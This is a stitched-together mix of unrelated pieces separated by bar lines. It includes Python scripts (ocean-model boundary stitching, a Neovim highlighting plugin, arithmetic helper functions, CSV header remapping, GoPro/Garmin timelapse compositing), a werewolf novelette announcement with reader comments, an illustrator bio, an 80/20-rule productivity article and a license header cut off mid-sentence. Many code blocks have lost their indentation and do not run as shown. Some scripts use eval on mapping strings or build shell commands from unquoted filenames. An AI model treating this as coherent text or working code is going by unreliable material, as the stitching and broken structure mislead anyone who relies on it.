ncout = seapy.roms.ncgen.create_clim(clim_file,
eta_rho=grid.ln, xi_rho=grid.lm, s_rho=grid.n,
ntimes=len(times), reftime=reftime,
title="stitched from boundary interpolation")
ncout.variables["clim_time"][:] = times
for side in bry:
if bry[side] is None:
continue
ncin = netCDF4.Dataset(bry[side])
for fld in seapy.roms.fields:
idx = [np.s_[:] for i in range(seapy.roms.fields[fld]["dims"] + 1)]
dat = ncin.variables[fld][:]
shp = dat.shape
            if side == "west":
                idx[-1] = np.s_[:shp[-1]]
            elif side == "east":
                idx[-1] = np.s_[-shp[-1]:]
            elif side == "north":
                idx[-2] = np.s_[-shp[-2]:]
            elif side == "south":
                idx[-2] = np.s_[:shp[-2]]
            # netCDF4 variables expect a tuple index, not a list
            ncout.variables[fld][tuple(idx)] = dat
ncout.sync()
ncin.close()
ncout.close()
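A minimal, self-contained illustration of the side-dependent slicing used above (hypothetical array shapes; no seapy or netCDF4 required — `boundary_index` is a standalone stand-in for the inline index logic):

```python
import numpy as np

def boundary_index(ndims, side, strip):
    # Build a full-slice index, then narrow the last (xi) axis for
    # west/east or the second-to-last (eta) axis for north/south.
    idx = [np.s_[:]] * ndims
    if side == "west":
        idx[-1] = np.s_[:strip]
    elif side == "east":
        idx[-1] = np.s_[-strip:]
    elif side == "north":
        idx[-2] = np.s_[-strip:]
    elif side == "south":
        idx[-2] = np.s_[:strip]
    return tuple(idx)

field = np.zeros((4, 10, 12))   # (time, eta_rho, xi_rho)
dat = np.ones((4, 10, 3))       # a 3-column strip interpolated at the west edge
field[boundary_index(3, "west", dat.shape[-1])] = dat
assert field[:, :, :3].all() and not field[:, :, 3:].any()
```

Only the boundary strip is written; the interior of `field` stays untouched, which is exactly how the stitched climatology ends up with no data where interpolation wasn't performed.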
|
After a family trip to Seaside Heights, we had some fun going by the “Shore Store” and “The House”. We even saw the rhinestone glasses at the Shore Store. Enjoy!
|
# ============================================================================
# FILE: chromatica.py
# AUTHOR: Yanfei Guo <yanf.guo at gmail.com>
# License: MIT license
# ============================================================================
import pynvim
from chromatica import logger
from chromatica.chromatica import Chromatica
import chromatica.util as util
import time
@pynvim.plugin
class ChromaticaPlugin(object):
def __init__(self, vim):
self.__vim = vim
util.use_vim(vim)
@pynvim.function("_chromatica", sync=True)
def init_chromatica(self, args):
self.__chromatica = Chromatica(self.__vim)
self.__vim.vars["chromatica#_channel_id"] = self.__vim.channel_id
@pynvim.rpc_export('chromatica_enable_logging', sync=True)
def enable_logging(self, level, logfile):
if not self.__chromatica.debug_enabled:
logger.setup(self.__vim, level, logfile)
self.__chromatica.debug_enabled = True
self.__chromatica.dump_debug_info()
@pynvim.rpc_export("chromatica_highlight")
def highlight(self, context):
context["rpc"] = "chromatica_highlight"
try:
self.__chromatica.highlight(context)
except:
self.__chromatica.debug(context)
raise
@pynvim.rpc_export("chromatica_parse")
def parse(self, context):
context["rpc"] = "chromatica_parse"
try:
self.__chromatica.parse(context)
except:
self.__chromatica.debug(context)
raise
@pynvim.rpc_export("chromatica_delayed_parse")
def delayed_parse(self, context):
context["rpc"] = "chromatica_delayed_parse"
try:
self.__chromatica.delayed_parse(context)
except:
self.__chromatica.debug(context)
raise
@pynvim.rpc_export("chromatica_print_highlight")
def print_highlight(self, context):
context["rpc"] = "chromatica_print_highlight"
try:
self.__chromatica.print_highlight(context)
except:
self.__chromatica.debug(context)
raise
@pynvim.rpc_export("chromatica_clear_highlight")
def clear_highlight(self):
self.__chromatica.clear_highlight()
@pynvim.rpc_export("chromatica_show_info", sync=True)
def show_info(self, context):
self.__chromatica.show_info(context)
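The five RPC handlers above repeat the same tag/try/debug/re-raise shape. One way to factor that out is a small decorator — a sketch only: `rpc_guard` is hypothetical, and a real version would call `self.__chromatica.debug(context)` rather than `print`:

```python
def rpc_guard(name):
    # Tag the context with the RPC name, delegate to the handler, and
    # re-raise after reporting the context on failure.
    def wrap(fn):
        def inner(self, context):
            context["rpc"] = name
            try:
                return fn(self, context)
            except Exception:
                print("debug context:", context)  # stand-in for self.__chromatica.debug
                raise
        return inner
    return wrap

class Demo(object):
    @rpc_guard("chromatica_highlight")
    def highlight(self, context):
        return context["rpc"]

assert Demo().highlight({}) == "chromatica_highlight"
```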
|
April Connors is an Illustrator and Visual Development artist based in Los Angeles. She has also taught at Walt Disney Animation Studios, Gnomon School of Visual Effects, 3Kicks Fine Art Studio and Otis College of Art and Design. April has exhibited her works in a number of countries including Hong Kong, Mexico and the United States. Her work is traditional and dynamic in nature, and she also has experience in fashion illustration. April has studied at the Concept Design Academy, 3Kicks Art Studio, and Art Center at Night.
|
from functools import reduce  # Python 3: reduce moved to functools

class Loki:
@staticmethod
def printf(x):
print(x)
@staticmethod
def plus(*args):
return reduce((lambda x, y : x + y), args)
@staticmethod
def minus(*args):
return reduce((lambda x, y : x - y), args)
@staticmethod
def div(*args):
return reduce((lambda x, y : x / y), args)
@staticmethod
def mult(*args):
return reduce((lambda x, y : x * y), args)
@staticmethod
def and_(*args):
return reduce((lambda x, y : x and y), args)
@staticmethod
def or_(*args):
return reduce((lambda x, y : x or y), args)
@staticmethod
def eq(*args):
return not not reduce((lambda x, y : x if x == y else False), args)
@staticmethod
def neq(*args):
return not Loki.eq(*args)
@staticmethod
def lt(*args):
return not not reduce((lambda x, y : y if x < y else False), args)
@staticmethod
def lte(*args):
return not not reduce((lambda x, y : y if x <= y else False), args)
@staticmethod
def gt(*args):
return not not reduce((lambda x, y : y if x > y else False), args)
@staticmethod
def gte(*args):
return not Loki.lt(*args)
@staticmethod
def mod(x, y):
return x % y
@staticmethod
def range(n):
return range(n)
@staticmethod
def get(e, i):
return e[i]
@staticmethod
    def set(x, v):
        x = v  # note: rebinds a local name only; has no effect on the caller
@staticmethod
def assoc(x, i, v):
x[i] = v
return x
@staticmethod
def in_(x, l):
return (x in l)
@staticmethod
def sc(n, x, l):
return n[x:l]
@staticmethod
def dc(n, x, l):
return n[x::l]
@staticmethod
def dcm(n, x, m, l):
return n[x:m:l]
@staticmethod
def not_ (x):
return not x
#END LOKI HELPER FUNCTIONS
Loki.printf("TODO QUOTED")
Loki.printf("py")
(Loki.printf("print this!") if Loki.lt(1, 2) else Loki.printf("do not print this!"))
x = 5
(Loki.printf("this is wrong") if Loki.gt(x, 10) else Loki.printf("this is right"))
for x in Loki.range(3):
Loki.printf(x)
for x in Loki.range(3):
Loki.printf("x")
Loki.printf(x)
for y in Loki.range(3):
Loki.printf("y")
Loki.printf(y)
Loki.printf(x)
x = 7
Loki.printf(x)
class Rocket():
    def __init__(self, x):
        self.speed = x
        self.color = "red"
        self.fuel = 7
def lift_off (self):
return Loki.printf(Loki.plus("I'm flying @ ", (self.speed() if callable(self.speed) else self.speed), " speed"))
def toString (self):
return Loki.plus("I'm a ", (self.color() if callable(self.color) else self.color), " rocket")
r = Rocket(7)
Loki.printf((r.speed() if callable(r.speed) else r.speed))
r.speed = 10
Loki.printf((r.speed() if callable(r.speed) else r.speed))
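The chained comparisons above ride on `reduce` with `False` as a failure sentinel. A self-contained sketch of the trick, including its falsy-operand caveat (`chain_lt`/`chain_eq` are standalone re-implementations, not part of Loki):

```python
from functools import reduce

def chain_lt(*args):
    # Carry the right-hand operand forward; collapse to False the first
    # time a comparison fails. "not not" coerces the survivor to a bool.
    return not not reduce(lambda x, y: y if x < y else False, args)

def chain_eq(*args):
    return not not reduce(lambda x, y: x if x == y else False, args)

assert chain_lt(1, 2, 3) is True    # 1 < 2 < 3
assert chain_lt(1, 3, 2) is False   # chain breaks at 3 < 2
assert chain_eq(4, 4, 4) is True
# Caveat: falsy operands defeat the sentinel: 0 == 0 holds, yet:
assert chain_eq(0, 0) is False
```

The sentinel scheme works because a successful comparison always yields an operand, and the only way to get `False` out of the fold is for some step to fail — unless, as the last assertion shows, a legitimate operand is itself falsy.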
|
Pack, the werewolf romance novelette that I originally wrote back in 2008 for the Mammoth Book of Paranormal Romance anthology, is now available as a single ebook for only $1.99.
Marlee Peters is tired of putting her dreams on hold, so when her friends can’t continue on a long-anticipated hike of Yellowstone National Park, she goes on without them. But Marlee isn’t alone in the woods; she’s being hunted by a pack of frighteningly intelligent wolves. When a fight for survival takes an impossible turn, Marlee realizes that the enigmatic stranger who saves her might either be her dream come true…or her waking nightmare.
Order at: Amazon, B&N, iBooks , Kobo.
As I said, back in early 2008, I wrote a werewolf romance story called Pack for the Mammoth Book Of Paranormal Romance anthology. Later, Pack was re-published with authors Ilona Andrews and Meljean Brook in an e-book-only anthology called Under Her Skin. In the years since, Meljean, Ilona, and I have dipped more into self-publishing, so we decided to break up the anthology and self-publish our stories as individual novelettes instead. While I was rereading Pack in preparation of this, I made some scene additions to add depth to the characters’ thoughts, motivations, and feelings. You see, the old anthology that I’d written this for had a word-count limit that I’d already far exceeded, so I’d left those things out in the previously-published versions. Then, I posted it for free on my website blog for a limited time as a gift to my readers. Since then – proving that I cannot stop tinkering with a story unless deadlines force me to – I also added more content in the form of additional scene tweaks as well as an entire new chapter featuring a love scene between Marlee and Daniel. I’m so pleased that re-publishing this story on its own allowed me to add this additional material, because the end result is over twenty percent more content in this version versus the previously-published editions, and – I believe – a better story overall.
I hope you enjoy Pack, whether this is your first time reading it, or whether you read it before in an earlier version.
Audio readers: I am trying to get this out in audio, too. More to come on that.
Want to get reminded about new releases, special sales and personal appearances in your city? Sign up for Jeaniene’s newsletter!
This is my second time reading Pack in Under Her Skin. I find myself looking forward to buying the new book so I can read more. I would love to read about how Marlee did through her change and first year or two as a werewolf.
I definitely feel Pack would be a great first book for a series and I haven’t even read the republished version yet.
I loved the novelette pack. Are you hopefully going to continue it?
Thank you! One day, I’d like to expand on the world and write another werewolf novel, but at this time, I have no plans to continue Marlee and Daniel’s story. I loved writing about them, but I can’t turn everything I write into a series ;).
I have read everything you’ve written…thank you for the Pack…teaser….we want more Jeaniene! Looking forward to meeting up with Vlad again…I miss Kat and Bones too. Ivy’s story was dark, but I’m going to re-read it before the next book arrives….can’t wait!
Is this an appropriate book? I haven’t read it yet, but my parents are skeptical about it. I am only 13, but I love all books. Please reply soon.
I do NOT recommend this story for anyone under 18. It contains very adult material. I do recommend Wicked Lovely by Melissa Marr, Raised By Wolves by Jennifer Lynn Barnes, and Darkest Powers by Kelley Armstrong.
Please continue Daniel and Marlee’s story! What a cliffhanger! AGH!
Are you going to do a series with Marilee and Daniel????
Probably not. Sometimes, I have to write a one-and-done :).
Great story, I really enjoyed it!
|
#!/usr/bin/env python3.4
# ---------------------------------------------------------------------------- #
import csv, os, glob
from Constants import *
from tqdm import tqdm
# ---------------------------------------------------------------------------- #
os.chdir('../../../../Desktop/')
CSVFiles = glob.glob('*.csv')
# ---------------------------------------------------------------------------- #
# Re-Map Column Fields
def ReMapHeaderFields():
for index in tqdm(range(0,len(CSVFiles))):
with open(CSVFiles[index],'rU') as InputFile,\
open('___ReMapped--' + str(CSVFiles[index]),'at') as OutputFile:
Input = csv.reader(InputFile)
Output = csv.writer(OutputFile)
Output.writerow(HeaderRowMain)
FirstLine = True
for line in tqdm(Input):
if FirstLine:
for IndexA in range(0,len(line)):
MatchHeaderFields(line[IndexA], IndexA)
FirstLine = False
else:
Newline = []
for IndexB in range(0,len(HeaderRowMain)):
if IndexB in HeaderDict:
Newline.append(eval(HeaderDict[IndexB]))
else:
Newline.append('')
Output.writerow(Newline)
def MultiFileMarge():
FirstFileUseHeaderRow = True
CSVFiles = glob.glob('___*.csv')
for line in tqdm(CSVFiles):
with open(line,'rU') as File,\
open('>>>> MERGED_FILE <<<<.csv','at') as Merge:
OutputClean = csv.writer(Merge)
Input = csv.reader(File)
if FirstFileUseHeaderRow:
for line in tqdm(Input):
OutputClean.writerow(line)
FirstFileUseHeaderRow = False
else:
next(File)
for line in tqdm(Input):
OutputClean.writerow(line)
# ---------------------------------------------------------------------------- #
if __name__ == '__main__':
print('=======================================')
print(' RE-MAP & MERGE ')
print('=======================================')
ReMapHeaderFields()
MultiFileMarge()
print('=======================================')
print(' COMPLETED ')
print()
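The header-skipping merge in `MultiFileMarge` boils down to one idea: keep the header row only from the first file. A self-contained sketch using in-memory streams (the `merge_csvs` helper is hypothetical):

```python
import csv
import io

def merge_csvs(streams):
    # Keep the header row only from the first stream; skip it on the rest.
    out = io.StringIO()
    writer = csv.writer(out)
    for i, stream in enumerate(streams):
        rows = csv.reader(stream)
        if i > 0:
            next(rows, None)  # drop this file's header row
        for row in rows:
            writer.writerow(row)
    return out.getvalue()

a = io.StringIO("h1,h2\r\n1,2\r\n")
b = io.StringIO("h1,h2\r\n3,4\r\n")
assert merge_csvs([a, b]) == "h1,h2\r\n1,2\r\n3,4\r\n"
```

Skipping via the csv reader (rather than `next(File)` on the raw file object) avoids mixing buffered iteration on the file with the reader's own iteration.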
|
Asia is the world's largest continent, comprising an enormous wealth of languages, both in its present and in its eventful past. This series contributes to the understanding of this linguistic variety by publishing books from different theoretical backgrounds and different methodological approaches, each dealing with at least one Asian language. By adopting a maximally integrative policy, the editors of the series hope to promote theoretical discussions whose solutions may, in turn, help to overcome the theoretical bias towards West European languages and thus provide a deeper understanding of Asian linguistic structures and of human language in general.
|
#!/usr/bin/python
"""Stitch together timelapse images with a Garmin track.
Draws graphs of Garmin data (speed, HR, cadence, elevation) along with a Google
map of position (updated every 10th of a mile). Google Maps has some very
aggressive rate limits, which means this script has to sleep _a lot_ and
frequently fail. Fortunately, files are staged, and it can pick up where it
left off.
Relies on the EXIF data from the timelapse files to match the track up with the
images.
Tested on Linux with a GoPro Hero3 and a Garmin Edge 500:
https://www.youtube.com/watch?v=Y1VTvU5xEFM
USAGE:
Due to Google Maps' aggressive throttling it's best to put this in a loop.
while ! python biketl.py --fitfile=garmin_file.fit --imgsrcglob='images/gopro-source/*.JPG' --stagingdir=/tmp/temp-dir ; do sleep 5m ; done
"""
import argparse
import bisect
import datetime
import glob
import os
import sys
import tempfile
import time
import urllib2
ROOT = os.path.dirname(sys.argv[0])
sys.path.append(os.path.join(ROOT, 'python-fitparse'))
sys.path.append(os.path.join(ROOT, 'motionless'))
sys.path.append(os.path.join(ROOT, 'exif-py'))
from fitparse import activity
from motionless import DecoratedMap, LatLonMarker
from matplotlib import pyplot
from matplotlib import font_manager
from matplotlib.pyplot import np
import EXIF
SEMICIRCLE_RATIO = 180.0/(2**31)
MS_TO_MPH_RATIO = 2.23694
METERS_TO_MILES_RATIO = 0.000621371
METERS_TO_FEET_RATIO = 3.28084
#FONT_PATH = '/home/james/code/biketl/zekton.otf'
NUM_GRAPH_POINTS=100
class ImagesAndPointsDoNotOverlap(RuntimeError):
pass
class NoImagesFound(RuntimeError):
pass
class NoGPSTrack(RuntimeError):
pass
def GetPointsFromActivity(filename):
print 'loading activity %s' % filename
a = activity.Activity(filename)
a.parse()
points = []
for record in a.get_records_by_type('record'):
points.append(Point(record))
return points
class PointList(object):
def __init__(self, fitfile):
self._points = GetPointsFromActivity(fitfile)
self._times = [point.time for point in self._points]
def __getitem__(self, index):
return self._points[index]
def __len__(self):
return len(self._points)
def GetIndexNearestTime(self, t):
if not self._points:
return None
left_index = bisect.bisect_left(self._times, t)
right_index = bisect.bisect_right(self._times, t)
left, right = None, None
if left_index >= len(self._points):
return len(self._points)
if right_index < len(self._points):
left = self._points[left_index]
right = self._points[right_index]
if (t - left.time) < (right.time - t):
return left_index
else:
return right_index
return left_index
def GetPointsNearestTime(self, t, num_points=50):
index = self.GetIndexNearestTime(t)
if index is None:
return None
return self._points[max(0, index - num_points):index+1]
class Point(object):
CONVERTER = {
'semicircles': SEMICIRCLE_RATIO,
'm/s': MS_TO_MPH_RATIO,
'm': METERS_TO_FEET_RATIO,
}
def __init__(self, record):
self._record = record
@property
def distance(self):
dist = self._record.get_data('distance')
if dist:
return dist * METERS_TO_MILES_RATIO
return 0
@property
def position(self):
return (self.position_lat, self.position_long)
@property
def temp_f(self):
return self.temperature * 9.0 / 5.0 + 32.0
def __getattr__(self, field_name):
data = self._record.get_data(field_name)
if data is None:
return 0
unit_ratio = self.CONVERTER.get(self._record.get_units(field_name), 1)
return data*unit_ratio
@property
def time(self):
return self._record.get_data('timestamp')
def __repr__(self):
return str(self)
def __str__(self):
return "Time: %s\nPos: %s\nSpeed: %s mph\nHR: %s bpm\nCAD: %s rpm\nAlt: %s feet\nGrade: %d%%\nDist: %s miles\nTemp: %s" % (
self.time.ctime(), self.position, self.speed, self.heart_rate,
            self.cadence, self.altitude, self.grade, self.distance, self.temperature)
class Image(object):
def __init__(self, filename, timeskew=0):
self.filename = filename
self.timeskew = timeskew
with open(filename, 'r') as f:
self._tags = EXIF.process_file(f)
@property
def time(self):
ts = str(self._tags['EXIF DateTimeOriginal'])
return (datetime.datetime.strptime(ts, '%Y:%m:%d %H:%M:%S') +
datetime.timedelta(0, self.timeskew, 0))
def GetImages(files, timeskew=0):
"""Load images.
Args:
files: list of filenames
timeskew: seconds to add to each EXIF timestamp
Returns:
list of Image objects, ordered by exif timestamp (ascending)
"""
print 'Loading and sorting exif data for %d image files...' % len(files)
return sorted([Image(f, timeskew=timeskew) for f in files], key=lambda i:i.time)
def GetMapForPoints(output_dir, file_basename, points, mapdelay=3):
# Map creation is expensive, so check if we've already fetched it.
map_image_fname = os.path.join(output_dir, 'map-%s.png' % file_basename)
latest = points[-1]
if os.path.exists(map_image_fname):
print 'map already exists for %s' % latest
return map_image_fname
print 'getting map for %s' % latest
gmap = DecoratedMap(size_x=200, size_y=200, pathweight=4, pathcolor='red')
gmap.add_marker(
LatLonMarker(*tuple(str(x) for x in points[-1].position), color='red'))
print 'sleeping %s seconds' % mapdelay
time.sleep(mapdelay)
resp = urllib2.urlopen(gmap.generate_url() + '&zoom=11')
f = open(map_image_fname, 'w')
f.write(resp.read())
f.close()
return map_image_fname
def DrawSpeedLabel(speed, ax):
if speed > 25:
font = font_manager.FontProperties(size=14,
weight='bold')
#fname=FONT_PATH)
else:
font = font_manager.FontProperties(size=14)
#fname=FONT_PATH)
desc = ('%.1f MPH' % speed).rjust(8)
# I dislike that pyplot is global, it impinges my customary design.
pyplot.text(0, .90, desc, transform=ax.transAxes, fontproperties=font, color='white')
def DrawHeartRateLabel(hr, ax):
color = 'white'
if hr > 165:
desc = ('%d BPM' % hr).rjust(7)
font = font_manager.FontProperties(size=14, weight = 'bold')
#fname=FONT_PATH)
color = 'red'
else:
desc = 'Heart Rate (BPM)'
font = font_manager.FontProperties(size=14) #, fname=FONT_PATH)
pyplot.text(0, .90, desc, transform=ax.transAxes, fontproperties=font, color=color)
def GetFontPropertiesForGrade(grade):
return font_manager.FontProperties(size=14)
#fname=FONT_PATH)
def GetFontPropertiesForCadence(cadence):
return font_manager.FontProperties(size=14)
#fname=FONT_PATH)
def GetPointForLabel(points):
"""Get a point every few seconds, so that numbers are readable."""
# TODO: find the last point at a minute boundary
return points[-1]
def GetLineGraphForPoints(output_dir, file_basename, points):
"""Draw a 1024x160 graph."""
latest = GetPointForLabel(points)
figure = pyplot.figure(latest.time.ctime(), figsize=(10.24, 1), dpi=80)
# TODO: merge speed with cad on the same graph. merge hr with elevation.
ax = pyplot.subplot(1,4,1, axisbg='black')
ax.tick_params(axis='y', colors='gray', labelsize=10)
pyplot.xlim(0, NUM_GRAPH_POINTS)
pyplot.subplots_adjust(left=0.05, right=1, hspace=0, wspace=0.3)
pyplot.locator_params(nbins=4)
pyplot.ylim(0, 30)
pyplot.gca().get_xaxis().set_visible(False)
DrawSpeedLabel(latest.speed, ax)
pyplot.plot([point.speed for point in points], 'g-', linewidth=2)
ax = pyplot.subplot(1,4,2, axisbg='black')
ax.tick_params(axis='y', colors='gray', labelsize=10)
pyplot.xlim(0, NUM_GRAPH_POINTS)
pyplot.locator_params(nbins=4)
pyplot.gca().get_xaxis().set_visible(False)
pyplot.ylim(90, 190)
DrawHeartRateLabel(latest.heart_rate, ax)
pyplot.plot([point.heart_rate for point in points], 'r-', linewidth=2)
ax = pyplot.subplot(1,4,3, axisbg='black')
ax.tick_params(axis='y', colors='gray', labelsize=10)
pyplot.xlim(0, NUM_GRAPH_POINTS)
pyplot.locator_params(nbins=4)
pyplot.gca().get_xaxis().set_visible(False)
pyplot.ylim(0, 180)
#desc = ('%d RPM' % latest.cadence).rjust(7)
desc = 'Cadence (RPM)'
font = GetFontPropertiesForCadence(latest.cadence)
pyplot.text(0, .90, desc, transform=ax.transAxes, fontproperties=font, color='white')
pyplot.plot([point.cadence for point in points], color='#ffff00', linewidth=2)
ax = pyplot.subplot(1,4,4, axisbg='black')
ax.tick_params(axis='y', colors='gray', labelsize=10)
pyplot.xlim(0, NUM_GRAPH_POINTS)
pyplot.locator_params(nbins=4)
pyplot.gca().get_xaxis().set_visible(False)
pyplot.ylim(0, 500) # STP max elevation is 500ft
# TODO: flash the value in bold whenever VAM is > some ft per min.
# e.g. crossing every 100 feet for the first time in a while.
#desc = ('%d feet' % latest.altitude).rjust(11)
desc = 'Elevation (Feet)'
font = GetFontPropertiesForGrade(latest.grade) # XXX: grade is always 0?
pyplot.text(0, .90, desc, transform=ax.transAxes, fontproperties=font, color='white')
pyplot.gca().get_xaxis().set_visible(False)
pyplot.plot([point.altitude for point in points], 'c-', linewidth=2)
graph_image_fname = os.path.join(output_dir, 'graph-%s.png' % file_basename)
print 'generating graph %s' % graph_image_fname
pyplot.savefig(graph_image_fname, facecolor='black')
return graph_image_fname
def Run(cmd_str, log=None):
    if log:
        print '%s:\n  %s' % (log, cmd_str)
    if os.system(cmd_str) != 0:
        raise RuntimeError('command "%s" failed' % cmd_str)
def CompositeImages(pic_fname, gmap_fname, graph_fname, msg_bar_str, output_fname):
"""Assumes:
- 4:3 pic
    - 200x200 map (as produced by GetMapForPoints)
- 1024x160 graph
- 1024x768 output
"""
# Resize the image down
tmpfile = '/tmp/img-and-map.png'
cmd_str = 'convert -scale 1024x768 %s %s' % (pic_fname, tmpfile)
Run(cmd_str, log='scaling image down')
# Composite the resized picture and the map
cmd_str = 'composite -geometry +797+0 -dissolve 80 %s %s %s' % (
gmap_fname, tmpfile, tmpfile)
Run(cmd_str, log='composing picture and map')
# Add status bar (mileage and time)
cmd_str = ('convert %s '
'-fill "#0008" '
'-draw "rectangle 0,630,1024,665" '
'-fill "#cccccc" '
#'-font %s '
'-pointsize 24 '
'-annotate +10+655 "%s" '
'%s') % (tmpfile, #FONT_PATH,
msg_bar_str, tmpfile)
Run(cmd_str, log='adding status bar (mileage and time)')
# Composite the tempfile with the graph
cmd_str = 'composite -geometry +0+665 -dissolve 50 %s %s %s' % (
graph_fname, tmpfile, output_fname)
Run(cmd_str, log='composing graph and prev composition')
def GetOutputImagePath(output_dir, pic_fname):
return os.path.join(output_dir, 'merged-%s' % os.path.basename(pic_fname))
def CheckImagesAndPointsOverlap(images, pointlist):
"""Verify that points exist for the camera's time, fail otherwise."""
if not len(images):
raise NoImagesFound()
if not len(pointlist):
raise NoGPSTrack('GPS track has 0 points.')
if images[-1].time < pointlist[0].time:
raise ImagesAndPointsDoNotOverlap('Last image occurs before first GPS point.')
if images[0].time > pointlist[-1].time:
raise ImagesAndPointsDoNotOverlap('First image occurs after last GPS point.')
def main():
parser = argparse.ArgumentParser(
description='Timelapse from Garmin bike records.')
    parser.add_argument('--timeskew', type=int,
                        help='Add (or subtract) seconds from each EXIF timestamp.',
                        default=0)
parser.add_argument('--imgsrcglob', help='Image source glob pattern.',
default='/mnt/james/images/2013/gopro-flaming-geyser/*.JPG')
parser.add_argument('--stagingdir', help='Directory to stage files.',
default='/home/james/tmp/flaming-geyser-output')
parser.add_argument('--fitfile', help='Path to the source Garmin .fit file.',
default='/home/james/garmin/2013-06-22-07-05-20.fit')
    parser.add_argument('--loop', help='Iterate over all files.', dest='loop',
                        action='store_true', default=True)
    parser.add_argument('--noloop', help='Process only one file, then exit.',
                        dest='loop', action='store_false')
    parser.add_argument('--mapdelay', type=int,
                        help='Number of seconds to sleep after fetching a map.', default=5)
flags = parser.parse_args()
pointlist = PointList(flags.fitfile)
total_distance = pointlist[-1].distance
if not os.path.exists(flags.stagingdir):
print 'making %s' % flags.stagingdir
os.makedirs(flags.stagingdir)
images = GetImages(glob.glob(flags.imgsrcglob), flags.timeskew)
CheckImagesAndPointsOverlap(images, pointlist)
prev_point = None
map_image_fname = None
for image in images:
output_image_path = GetOutputImagePath(flags.stagingdir, image.filename)
# Check if we've already rendered an image based on this source image.
if os.path.exists(output_image_path):
print 'skipping %s' % image.filename
continue
print 'processing %s' % image.filename
# Get the previous N points
points = pointlist.GetPointsNearestTime(image.time, num_points=NUM_GRAPH_POINTS)
latest_point = points[-1]
# Get a graph
img_basename = os.path.basename(image.filename).replace('.JPG', '')
graph_image_fname = GetLineGraphForPoints(flags.stagingdir, img_basename, points)
# Map creation is expensive, so only get a new map if we've moved.
if (map_image_fname
and prev_point
and ('%.1f' % prev_point.distance) == ('%.1f' % latest_point.distance)):
print 'distance unchanged, using last map'
else:
# Get a map
map_image_fname = GetMapForPoints(flags.stagingdir, img_basename, points,
mapdelay=flags.mapdelay)
# Put them all together
elapsed_timedelta = latest_point.time - pointlist[0].time
elapsed_str = ':'.join(str(elapsed_timedelta).split(':')[:2])
msg_bar_str = 'Distance: %.1f miles (%.1f miles to go) Time: %s (%s elapsed) Temp: %dF' % (
latest_point.distance,
total_distance - latest_point.distance,
latest_point.time.strftime('%l:%M %P'),
elapsed_str,
latest_point.temp_f)
CompositeImages(image.filename, map_image_fname, graph_image_fname,
msg_bar_str, output_image_path)
prev_point = latest_point
if not flags.loop:
print 'exiting after one iteration'
sys.exit(0)
# make a movie:
# mencoder "mf://merged-*.JPG" -mf fps=12 -o output.avi -ovc lavc -lavcopts vcodec=mpeg4:mbd=2:trell:vbitrate=7000
if __name__ == '__main__':
main()
|
The 80 20 Rule is a fantastic tool you can use to increase your productivity and well-being. It can help you to identify the areas of your life which are responsible for your major successes, and it can also aid you by pointing out which parts of your life are causing most of your problems.
It’s so simple to apply the 80 20 rule too. You will be able to complete the exercises in this article in about ten minutes, ending up with a surprisingly accurate overview of what’s causing the good and bad in your life – with action points so you can implement changes and progress. Basically, the aim is to do more of the stuff that makes you happy, and less of the stuff that makes you stressed.
Before we get into that though, here’s a bit of background on the origins of the rule – also known as the “Pareto Principle”, the “Law of the Vital Few”, and “Pareto’s Law”.
Vilfredo Pareto was a controversial Italian economist and sociologist, whose best-known achievement was the discovery of the 80 20 rule.
Pareto realised that 80% of the wealth in Italy was concentrated in the hands of just 20% of the people. Intrigued, he applied this formula to other countries’ economies – and saw that the 80 20 principle applied to their economies too.
Presumably, dear old Vilfredo was a little shocked when he discovered that the 80 20 rule not only applied to economics, but to his garden too. He liked to plant peas, you see, and he stumbled across the fact that 80% of the peas sprouted from just 20% of the peapods he planted. With this little anomaly, the 80 20 rule was born.
Since Pareto’s time, more and more people have found that their lives and businesses are governed by the 80 20 rule. Microsoft, for example, realised that by fixing the top 20% of the most reported bugs, 80% percent of the errors and crashes were eliminated from Windows.
Salespeople realise that 80% of their sales often come from just 20% of their clients, and focus their time on this 20% accordingly. You probably inadvertently use the 80 20 principle too – it’s likely that you wear your favourite 20% items of clothing up to 80% of the time... be honest now!
The 80 20 rule states that, in many situations, roughly 80% of the effects come from approximately 20% of the causes.
This means that if 80% of your results come from 20% of your actions - and you can identify those actions - it is possible to improve your results and become more productive, by simply doing more of these actions.
Equally, if 80% of your problems come from 20% of your activities or beliefs, you can isolate them and stop doing them.
Here are 7 questions that will help you to understand how the 80 20 rule operates in your life – and allow you to make changes so you get more of the good stuff, and less of the bad.
If you take a few minutes to answer these questions honestly, you’re likely to have a remarkably simple - yet accurate - overview of what’s good and bad in your life.
My recommendation is to answer all the questions, and then create an Action Point for each. After all, knowledge is of limited value without action.
For example, if your answer to question 3 is “The 20% of my work activities that are causing 80% of my work results are pitching, being tenacious and not giving up”, then the action point would be to ensure that you spend more time pitching, being tenacious, and not giving up!
Equally, if your answer to number 6 is “The 20% of my skills that are causing 80% of my success are my charm, interpersonal skills and confidence”, then you could create an action plan to get a job that emphasises these qualities and allows you to use them more of the time... Simple!
Sometimes, just having this kind of clarity will allow you to make the changes you desire. At the very least, this knowledge will ensure that you have a deeper understanding of what makes you tick, and will point out the areas that you should focus on to be more productive and get better results.
(1) Which 20% of activities are causing 80% of my happiness?
(2) Which 20% of activities are causing 80% of my stresses?
(3) Which 20% of work activities are causing 80% of my work results?
(4) Which 20% of my friends are contributing to 80% of my fun?
(5) Which 20% of my friends are contributing to 80% of my issues?
(6) Which 20% of my skills and qualities are responsible for 80% of my success?
(7) Which 20% of my beliefs are responsible for 80% of my tribulations?
By answering these questions honestly, you’ll have an overview of the things you do that make you happy – and the things you do that make you sad. You’ll realise what to focus on at work to make yourself more productive. You’ll know which of your friends are affirming your beliefs and aspirations – and you might know which of your friends you’ll have to have a quiet word with to explain how they make you feel. Finally, you’ll identify which of your skills and qualities are contributing most to your success, and you’ll have isolated some self-limiting beliefs.
Not bad for 10 minutes, eh?
Try playing with the 80 20 rule in your life. It’s a remarkably effective way to become more productive, and it helps you to be happier too. All that’s left to say is a big old “thank you” to Vilfredo... and good luck!
|
# sigtools - Collection of Python modules for manipulating function signatures
# Copyright (c) 2013-2015 Yann Kaiser
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
